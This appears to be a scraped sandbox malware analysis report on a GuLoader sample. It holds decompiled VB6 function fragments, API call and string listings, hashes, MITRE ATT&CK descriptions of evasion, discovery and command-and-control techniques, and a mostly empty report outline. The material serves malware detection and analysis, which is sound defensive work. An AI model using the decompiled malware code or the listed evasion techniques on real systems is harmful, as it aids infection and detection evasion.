0x00425b6e
0x00425b7d
0x00425b80
0x00425b86
0x00425b93
0x00425b9b
0x00425b9b
0x00425ba0
0x00425bd5
0x00425bdd
0x00425be2

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042591A
#608.MSVBVM60(?,000000A1,?,?,?,?,004015F6), ref: 00425947
__vbaVarDup.MSVBVM60 ref: 00425960
#518.MSVBVM60(?,?), ref: 0042596D
__vbaVarTstNe.MSVBVM60(?,?,?,?), ref: 0042597A
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?), ref: 00425991
__vbaNew2.MSVBVM60(00403C1C,00427544,?,?,?,004015F6), ref: 004259B8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00425A0E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000140), ref: 00425A6A
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000140), ref: 00425A89
#616.MSVBVM60(Jonbytningens,0000005C), ref: 00425A95
__vbaStrMove.MSVBVM60(Jonbytningens,0000005C), ref: 00425A9F
__vbaNew2.MSVBVM60(00403C1C,00427544,Jonbytningens,0000005C), ref: 00425AB7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00425B0D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,000000F8), ref: 00425B69
__vbaStrMove.MSVBVM60(00000000,?,00403C2C,000000F8), ref: 00425B93
__vbaFreeObj.MSVBVM60(00000000,?,00403C2C,000000F8), ref: 00425B9B
__vbaFreeStr.MSVBVM60(00425BE3,?,?,?,004015F6), ref: 00425BD5
__vbaFreeStr.MSVBVM60(00425BE3,?,?,?,004015F6), ref: 00425BDD

Strings

Barografer, xrefs: 0042594C
DuB, xrefs: 00425AD2
[B, xrefs: 00425BDA
Jonbytningens, xrefs: 00425A90
DuB, xrefs: 004259D3

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#518#608#616ChkstkList
String ID: Barografer$DuB$DuB$Jonbytningens$[B
API String ID: 3734238518-3129503355
Opcode ID: 7510de19c4ca892f14c2f1bb8b8cbb38fe7cdfa00d7846b05cbf1fecccc1d13e
Instruction ID: 9b473f61f771ad3568be85be8ee1cbf5cff367bdfec83ad449fcd426b4a442c7
Opcode Fuzzy Hash: 7510de19c4ca892f14c2f1bb8b8cbb38fe7cdfa00d7846b05cbf1fecccc1d13e
Instruction Fuzzy Hash: 3881E771A40228EFDB10EF95CC45BDDBBB4BF08304F5080AAE149B72A1DB789A85DF55

Uniqueness

Uniqueness Score: -1.00%

Function 0042581F, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0042581F(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				char _v44;
				char _v60;
				char _v64;
				char* _v72;
				intOrPtr _v80;
				char* _t29;
				intOrPtr _t41;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(0x40);
				L004015F0();
				_v12 = _t41;
				_v8 = 0x401598;
				L004018DE();
				_v72 = L"Navigator";
				_v80 = 8;
				L004018FC();
				_push(0);
				_push(0x80);
				_push( &_v44);
				_push( &_v60);
				L00401740();
				_push( &_v60);
				_push( &_v64);
				L00401722();
				_push( &_v64);
				_push( &_v28);
				L00401728();
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L004018F6();
				_push(0x4258e9);
				L004018E4();
				_t29 =  &_v28;
				_push(_t29);
				_push(0);
				L004017A0();
				return _t29;
			}

0x00425824
0x0042582f
0x00425830
0x00425837
0x0042583a
0x00425842
0x00425845
0x00425852
0x00425857
0x0042585e
0x0042586b
0x00425870
0x00425872
0x0042587a
0x0042587e
0x0042587f
0x00425887
0x0042588b
0x0042588c
0x00425894
0x00425898
0x00425899
0x004258a1
0x004258a5
0x004258a6
0x004258a8
0x004258b0
0x004258d8
0x004258dd
0x004258e0
0x004258e1
0x004258e3
0x004258e8

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042583A
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00425852
__vbaVarDup.MSVBVM60 ref: 0042586B
#717.MSVBVM60(?,?,00000080,00000000), ref: 0042587F
__vbaVar2Vec.MSVBVM60(?,?,?,?,00000080,00000000), ref: 0042588C
__vbaAryMove.MSVBVM60(?,?,?,?,?,?,00000080,00000000), ref: 00425899
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004258A8
__vbaFreeStr.MSVBVM60(004258E9), ref: 004258D8
__vbaAryDestruct.MSVBVM60(00000000,?,004258E9), ref: 004258E3

Strings

Navigator, xrefs: 00425857

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$#717ChkstkCopyDestructListMoveVar2
String ID: Navigator
API String ID: 2301300132-3947187026
Opcode ID: 3df075880c4e8816ef33399e613a1eaf4c0baab84f18073cec6cd229508518fe
Instruction ID: 6a67e730fad9b39f50e27318765839e1674d197514a860e8d766d4b19915992d
Opcode Fuzzy Hash: 3df075880c4e8816ef33399e613a1eaf4c0baab84f18073cec6cd229508518fe
Instruction Fuzzy Hash: 5D11CBB2D4020DBADB00FBD1DC46FDEBBBCAB04744F50452BF205B6191EB78A6498B65

Uniqueness

Uniqueness Score: -1.00%

Function 0042494D, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0042494D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _v60;
				intOrPtr _v68;
				char* _t24;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t40 = _t39 - 0xc;
				 *[fs:0x0] = _t40;
				L004015F0();
				_v16 = _t40;
				_v12 = 0x401528;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4015f6, _t37);
				L004018DE();
				_v60 = L"10-10-10";
				_v68 = 8;
				L004018FC();
				_push(0);
				_t24 =  &_v52;
				_push(_t24);
				L00401872();
				L0040192C();
				L00401938();
				_v28 = 0xc53b0;
				_push(0x4249f6);
				L004018E4();
				L004018E4();
				return _t24;
			}

0x00424950
0x0042495f
0x00424969
0x00424971
0x00424974
0x0042497b
0x0042498a
0x00424993
0x00424998
0x0042499f
0x004249ac
0x004249b1
0x004249b3
0x004249b6
0x004249b7
0x004249c1
0x004249c9
0x004249ce
0x004249d5
0x004249e8
0x004249f0
0x004249f5

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00424969
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00424993
__vbaVarDup.MSVBVM60 ref: 004249AC
#705.MSVBVM60(?,00000000), ref: 004249B7
__vbaStrMove.MSVBVM60(?,00000000), ref: 004249C1
__vbaFreeVar.MSVBVM60(?,00000000), ref: 004249C9
__vbaFreeStr.MSVBVM60(004249F6,?,00000000), ref: 004249E8
__vbaFreeStr.MSVBVM60(004249F6,?,00000000), ref: 004249F0

Strings

10-10-10, xrefs: 00424998

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$#705ChkstkCopyMove
String ID: 10-10-10
API String ID: 3591744543-2205135882
Opcode ID: 58c60a9184287c21eb8744a05f62e9a2bb3457face02052ebd90a89466259637
Instruction ID: 725650b361188e2a4034f360c027ab5faa200d739ddf121de00baecf2b889d27
Opcode Fuzzy Hash: 58c60a9184287c21eb8744a05f62e9a2bb3457face02052ebd90a89466259637
Instruction Fuzzy Hash: 7B11FA71900219ABCB00EF91D896FDEBBB4BF40704F50802AF4017B2A1DB7CAA05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00424DA6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00424DA6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v44;
				char* _v52;
				intOrPtr _v60;
				char* _t21;
				void* _t30;
				void* _t32;
				intOrPtr _t33;

				_t33 = _t32 - 0xc;
				 *[fs:0x0] = _t33;
				L004015F0();
				_v16 = _t33;
				_v12 = 0x401568;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4015f6, _t30);
				 *_a28 =  *_a28 & 0x00000000;
				L00401830();
				_v52 = L"userprofile";
				_v60 = 8;
				L004018FC();
				_t21 =  &_v44;
				_push(_t21);
				L0040172E();
				L0040192C();
				L00401938();
				_push(0x424e48);
				return _t21;
			}

0x00424da9
0x00424db8
0x00424dc2
0x00424dca
0x00424dcd
0x00424dd4
0x00424de3
0x00424de9
0x00424dec
0x00424df1
0x00424df8
0x00424e05
0x00424e0a
0x00424e0d
0x00424e0e
0x00424e18
0x00424e20
0x00424e25
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00424DC2
#598.MSVBVM60(?,?,?,?,004015F6), ref: 00424DEC
__vbaVarDup.MSVBVM60 ref: 00424E05
#667.MSVBVM60(?), ref: 00424E0E
__vbaStrMove.MSVBVM60(?), ref: 00424E18
__vbaFreeVar.MSVBVM60(?), ref: 00424E20

Strings

userprofile, xrefs: 00424DF1

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$#598#667ChkstkFreeMove
String ID: userprofile
API String ID: 2319187996-490100401
Opcode ID: 9a5c68418550624023a3654e0fbbfbcc9e956da9d92d8c959f495d3a5f612446
Instruction ID: 322d0e2b990dbe00e9d3cd7bff254a52e25d026fd6fbca958f0d572a0cd4ff53
Opcode Fuzzy Hash: 9a5c68418550624023a3654e0fbbfbcc9e956da9d92d8c959f495d3a5f612446
Instruction Fuzzy Hash: 33012C75900208ABDB00EFA5D846FCEBFB4FF44754F40802AF401BB1A1DB789A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00424CFE, Relevance: 9.0, APIs: 6, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00424CFE(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v44;
				char* _t18;
				void* _t26;
				void* _t28;
				intOrPtr _t29;

				_t29 = _t28 - 0xc;
				 *[fs:0x0] = _t29;
				L004015F0();
				_v16 = _t29;
				_v12 = 0x401558;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4015f6, _t26);
				_push(0x8e);
				_push(0xb0);
				_push(0x51);
				_push( &_v44);
				L004016A4();
				_t18 =  &_v44;
				_push(_t18);
				L00401908();
				L0040192C();
				L00401938();
				_push(0x424d87);
				L004018E4();
				return _t18;
			}

0x00424d01
0x00424d10
0x00424d1a
0x00424d22
0x00424d25
0x00424d2c
0x00424d3b
0x00424d3e
0x00424d43
0x00424d48
0x00424d4d
0x00424d4e
0x00424d53
0x00424d56
0x00424d57
0x00424d61
0x00424d69
0x00424d6e
0x00424d81
0x00424d86

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00424D1A
#539.MSVBVM60(000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D4E
__vbaStrVarMove.MSVBVM60(000000B0,000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D57
__vbaStrMove.MSVBVM60(000000B0,000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D61
__vbaFreeVar.MSVBVM60(000000B0,000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D69
__vbaFreeStr.MSVBVM60(00424D87,000000B0,000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D81

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$FreeMove$#539Chkstk
String ID:
API String ID: 679637206-0
Opcode ID: be4064ea8c6ebe3b65d73cc9141c35eaa2acb41f4aff6ee73144efebbadd9ac2
Instruction ID: 3981a885a631bff9d5509f01a61757284ddcaf8d542b64ede17bd6b0136ab70d
Opcode Fuzzy Hash: be4064ea8c6ebe3b65d73cc9141c35eaa2acb41f4aff6ee73144efebbadd9ac2
Instruction Fuzzy Hash: 65011D71A40208BBCB00EBA5CD56FDEBBB8EF44714F44402AF101BB1E1DBB89545CB99

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report G47wmLn8uy

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: G47wmLn8uy.exe PID: 6320 Parent PID: 1556

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: G47wmLn8uy.exe PID: 6320 Parent PID: 1556 G47wmLn8uy.exeCOMMON

Execution Graph

Graph

Function 04D1D38F, Relevance: 1.7, APIs: 1, Instructions: 238
COMMON

Function 04D18255, Relevance: 1.7, APIs: 1, Instructions: 220
COMMON

Function 04D1838C, Relevance: 1.7, APIs: 1, Instructions: 183
memorynativeCOMMON

Function 04D18498, Relevance: 1.7, APIs: 1, Instructions: 179
memorynativeCOMMON

Function 04D18441, Relevance: 1.6, APIs: 1, Instructions: 138
memorynativeCOMMON

Function 04D1841D, Relevance: 1.6, APIs: 1, Instructions: 136
memorynativeCOMMON

Function 04D184D9, Relevance: 1.6, APIs: 1, Instructions: 116
memorynativeCOMMON

Function 0041FAC7, Relevance: 210.8, APIs: 87, Strings: 33, Instructions: 770
COMMON

Function 00424074, Relevance: 110.6, APIs: 52, Strings: 11, Instructions: 303
COMMON

Function 004229C1, Relevance: 93.0, APIs: 41, Strings: 12, Instructions: 216
COMMON

Function 00424574, Relevance: 61.5, APIs: 31, Strings: 4, Instructions: 224
COMMON

Function 004261E8, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 153
COMMON

Function 00422770, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 133
COMMON

Function 0041FA04, Relevance: 4.5, APIs: 3, Instructions: 48
COMMON

Function 0040195C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 175
COMMON